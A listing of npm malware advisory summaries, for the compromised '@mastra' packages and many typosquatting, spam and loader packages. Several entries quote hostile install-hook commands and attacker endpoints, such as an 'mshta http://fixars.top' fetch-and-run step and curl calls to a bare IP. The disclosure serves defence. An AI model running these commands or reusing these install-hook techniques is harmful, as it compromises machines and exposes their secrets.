226594 matches found
Malicious code in @mastra/fastify (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 8e3fd453d8d4b3cf403d6d1445b295c8de0462a463c857388fb6c800c7c897cd Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/mcp-docs-server (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7fc99cf0a492f130a49e5c8590c8e66a4eeb3066d10fcf2907c39289f3b9de4b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/langsmith (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware bc3531517e5f0ee78107712a4c4a8f98578c0234f26ef2f1f532fd45eb37e3f2 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/s3 (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b98af8656b4d02975d6d03cdf3d9ae4e541032783b3c1ff99eabca651f72ffc0 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/fastembed (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c0da5948a94944695bcec24b99ac8a6b9ae7f5f31e8407f8c731379a6fda79c6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/sentry (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware a90a9fe05b300ccd70f99da266200500c5b05657bf9fbc3bee7d0f1ceeecbce0 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/auth (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 17414cdad6ecebc4308a1ef3124a1180d524e7a4a3a85d8dfde64ec1d0f6660b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/hono (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 1ed4177a8fb31809df36c88a8dddc4cd35e888cb1cebbc380e44c09acdd055f4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/datadog (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 419bbaa0a59a504f999013baee0011006c5cc6326045c0424705d91d3ac10c75 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/editor (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d15cb5bd62365f9e834fc44ed65e0db2c34aae555a5068c706cc9de0567a5fc0 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/otel-bridge (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 713aa738c88e89dcf078ff056e40389e2e9dc23573efcd4e3eed73533a730d28 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/dynamodb (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 88f1c319acc4591df560a402378efa8b10499f62c6014e785c983eed9c256a87 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/duckdb (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6615ebc91859f7aed9a6921b6af3bc33c8c74e3d0112cf4fb76873ed1ef53f44 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/schema-compat (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware fe7da4367bd2f6d5a4ce771270c6a76539f7e88b8f5bd054b23d725e25491cf7 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/evals (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d54f073f0d2ca3dc2620f0269e930084da1e62f637d51b1082a95f7ed0e549fa Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/ai-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b23e19b24d58761bd64000978f4e6b11335a7ebd4fe1f7bfabb33ce050255a8f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/langfuse (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7618b3dc13a76bea19bb632c59d32628bab37d9f3922fd4141b3897306f8a991 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/mcp (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e2c2d05f943ea7c6d8e1ae3bcfb7acc5497d114f89e6199f50e0ea3119256be2 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/pg (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 65d11d201385f24b081c214065739940247a0ca251cbf829b8c61df65e14dc66 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/libsql (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ae3d2946dd7a5ef81d52da321aac5fce8fe40c59a844491d6e6a07c1c84b08ee Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in mastra (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 177b60c8d45a21867d69c269f21c334505b8c0298b497cbed321d403be4311f7 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in abuden21 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4db5b16c4a10377beb73341758a26afed16a44d377dc03009601f610dd289b22 The tarball ships auto-publish.sh, which iterates a hardcoded list of 90 unrelated package names imillegal1..N, ishowfeet, nottuff, abuden,...
Malicious code in speed4 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 979f38f25a707a09a4469b3dd0f24c603e2d9a195eaaa9b2a9ea3d84076dc9d0 [email protected] is part of a self-cloning namespace-squatting family. The tarball contains auto-publish.sh which sets BASE="speed", TOTAL=5, copies the...
Malicious code in backoffice-charges-module (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 047eb92a0e8bb401b2c205765616c9b4b715ee7cfd33d2e6ef9dc8d645b77f04 On every npm install, the preinstall lifecycle script node index.js /dev/null 2&1 silently HTTPS-POSTs a JSON payload to https://avamnrwqo7.rbmock.de...
Malicious code in bubblestr (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7831cb93037b6f364e2174f6d4fb64b38bac958e54f3653b8a70810681972172 package.json declares "postinstall": "node index.js", and index.js is a heavily obfuscated single-file script RC4+base64 string-array with rotating...
Malicious code in tw-theme-kit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0144b9ea6743e481e49885f6375a8aa990e9a20bfc5da1148b7df59a9370736c The published entrypoints dist/index.cjs and dist/runtime.cjs contain an injected IIFE that assigns global.r = require and global.m = module, tags th...
Malicious code in vite-config-field (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8e5dabbc9cf746e153391fbe76f4dc54f9bccb9f7fd467d5b80d07c84ab1fb58 [email protected] impersonates the legitimate vite-plugin-pwa package README copies its banner/badges, funding field points at antfu's GitHub...
Malicious code in react-vite-assert (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 746aecfafda9a8f780b53ef40a5697875c52514dfa6ebb29306992ad06128395 [email protected] executes attacker-controlled JavaScript whenever the package is imported. The main entry transitively loads...
Malicious code in ssr-auth-sync (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fe43338279cb894ffacc18ef9ec757d4b4fa8b603672b0bedcb4c00d9f8a806 On require'ssr-auth-sync', index.js loads lib/writer.js, which immediately fetches a base64-hidden URL https://www.jsonkeeper.com/b/PJNZP, an anonymo...
Malicious code in package-uploader (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 69b86134d9cd019c2d8ad172eed54cd4a48839d69ed2c6af52b79ef5080da765 [email protected] ships an install-hook.js that runs automatically as the npm postinstall script package.json declares "postinstall": "node...
Malicious code in mci-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1ae26c09350fdf9fb630e382c71dd730583ba1822122d232cde49a259597264f On npm install, mci-sdk runs the postinstall hook node./src/exec.js, which imports mci from src/core/index.js and invokes it at module top level. The...
Malicious code in chai-test-mocks (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 61a1bfd9f5d478d2cc7c947470544e99015a830dd5ecbb7ad8cdb54976c8d6ef chai-test-mocks impersonates the legitimate chai-jest-mocks package replicated README, reused CircleCI/coveralls badges pointing at chai-jest-mocks b...
Malicious code in aillmgen (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341 On npm install, the package's preinstall hook preinstall.js runs exec'cmd /c "mshta http://fixars.top"', invoking the Windows mshta.exe binary to fet...
Malicious code in @kalipto/local (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f887073dda96085d83a06048f0010c3e6bef58c035579649a0f1ae6cad66828f The package is a purpose-built remote-control agent. On startup when the bin is invoked with --token, e.g. npx @kalipto/local --token..., index.js...
Malicious code in test-copppss (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 03106e028cee7749b7f3a9b327142fc0a402574bc72f3a62d129aa891afe85fe On npm install, the package's preinstall hook node index.js /dev/null 2&1 runs a shell pipeline that collects host identifiers — hostname, pwd, whoam...
Malicious code in @welcome-onboarding-web/mobile-focus-account-beta-merging (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5587680c29332345c8dd87172c03e0ba20f858c968d16c5a6c34717b8e95bcf5 scripts/postinstall.js is heavily obfuscated obfuscator.io with rotated base64-RC4 string array and a self-defending regex tamper check that...
Malicious code in binproto (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1bbe88a299e58c31b71b346733abb6684ce1a1e8e68fad118eca48a53a2b15a3 On any call to the exported pack function, index.js downloads a platform-specific binary from https://wotann-dktl.vercel.app/service/assets/fetchBina...
Malicious code in motion-lib (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176 [email protected] masquerades as a pino-style logger exports module.exports.pino, ships proto.js/multistream.js/transport.js/redaction.js/levels.js,...
Malicious code in js-digest (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 52847ff329757e0777e62c1c060455abc4ddd6f002c295a7f38d0e0489daf76f Package impersonates crypto-js: name is js-digest but package.json carries crypto-js's exact description "JavaScript library of cryptography...
Malicious code in pretie_x2 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bc0da1230156c752bfa8b3456568e30a9eeb73c4100bff87777ae57d9f562e75 Package name pretiex2 and its description 'Opinionated code formatter for modern JavaScript and TypeScript.' with keywords including prettier...
Malicious code in pretie_x1 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f6308c285cb943f91fc16f7872bce135b8347b827139f5ad0cf8706ba992f104 Package masquerades as the prettier formatter name pretiex1, description "Opinionated code formatter for modern JavaScript and TypeScript.", keywords...
Malicious code in nottuff7 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 014548171545d3357baafaf1ec9c1755860bacdcf94b42161d8e32b0c94ab3c8 This package is one of 95 names in a coordinated spam-publication family nottuff1-30, ishowfeet1-20, imillegal1-5, abuden, ratelimitsucks republishin...
Malicious code in nottuff23 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 41d429b099904a530f5dc4dfdd4724b7b6160c1de1330e0b103e8b8e3c737dfd The package is one of approximately 100 identically-named-pattern publishes from an automated bulk-publish operation. The tarball ships...
Malicious code in nottuff25 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 238a4f56f3433bf34de372e9a26264a33e33c6bde8592ddc73594d33ab7427f0 The tarball is not a Node library. package.json declares main: sw.js with description "package" and an empty author; sw.js is a browser ServiceWorker...
Malicious code in nottuff4 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c4f105cfb08cd05b609d2fb92793d7f8cb61d42add7d39e2491e6ba791f550e1 Package ships a Scramjet-based web proxy sw.js service worker + bare-mux + WASM rewriter under assets/ plus a static 'Riverbend Tutoring' index.html...
Malicious code in nottuff15 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ea629a411d1555cb4dbc80aa218539333aefce15e110ad0a5eaa16e4a58ab5f3 nottuff15 is one entry in a coordinated npm namespace-spam campaign. The tarball ships auto-publish.sh, a bash script that copies the package content...
Malicious code in mastraqqq (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6ab6891e53f407a1aebddb94c7d02dab202313f4576e37f378dfc2fc50705cd4 Package is published as mastraqqq but bundles a verbatim clone of the legitimate mastra CLI: the embedded package metadata declares name: "mastra",...
Malicious code in proto-bin (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1994859460fe293cad87eadf5c704e5c717c71deaaf54842f5e29fce765f99d5 Package is advertised as a prototype utilities library pack/unpack/checksum but its exported pack function calls an internal fetch that downloads a...
Malicious code in utils-common-helpers (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e6999f05f6036baf4f6d45de0c55c6dd63452dc59ab6ebcbad0ffebf93e60584 package.json declares a postinstall lifecycle hook that runs curl -s http://8.140.205.78 -o /dev/null on every install. The package's only functional...
Malicious code in react-hook-use-debounce-throttle-12 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af package.json declares a postinstall hook that runs node -e to issue an HTTPS request to the bare IP 8.140.205.78 on port 80 with all errors silently...